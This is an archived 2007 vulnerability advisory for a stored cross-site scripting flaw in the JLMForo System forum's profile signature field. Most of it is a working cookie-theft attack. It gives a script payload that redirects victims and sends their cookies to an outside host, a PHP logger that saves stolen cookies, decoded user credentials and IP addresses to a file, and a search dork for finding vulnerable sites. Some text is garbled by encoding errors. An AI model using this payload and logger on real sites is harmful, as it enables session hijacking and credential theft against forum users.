JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability

2007-11-27T00:00:00
ID SECURITYVULNS:DOC:18515
Type securityvulns
Reporter Securityvulns
Modified 2007-11-27T00:00:00

Description

JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability

Download:

http://www.miscodigos.com/aplicaciones/JLMForo%20System/

Bug found by Jose Luis Gуngora Fernбndez / JosS

Contact: sys-project[at]hotmail.com

Spanish Hackers Team

www.spanish-hackers.com

/server irc.freenode.net /join #fullsecure

d0rk: "Powered By JLMForo System"

Stop lammer

Explanation Basic :

1.- Register in the forum (registro.php) 2.- Put in your signature the XSS (modificarPerfil.php) 3.- Create a subject 4.- Wait to an answer to visualize the XSS

To Rob Cookies:

1є- Register in the forum (registro.php)

2є- Put in your signature the XSS (modificarPerfil.php):

<script>window.location=’http://yousite.com/xss.php?cookie=’+document.cookie</script>

3є- Upload in your Site:

<?php $archivo = fopen('log2.htm','a');//Aquн podemos cambiar el nombre del archivo a crear $cookie = $_GET['c']; $usuario = $_GET['id']; $ip = getenv ('REMOTE_ADDR'); $re = $HTTPREFERRER;

$fecha=date("j F, Y, g:i a"); fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br>

IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>'); fclose($archivo); ?>

4є- Chmod 777 archive

5є- Create a subject

6є- Wait to an answer to run the XSS

//---------------------------------------\\

Greetz To: All Hackers Jose Luis Gуngora Fernбndez / JosS!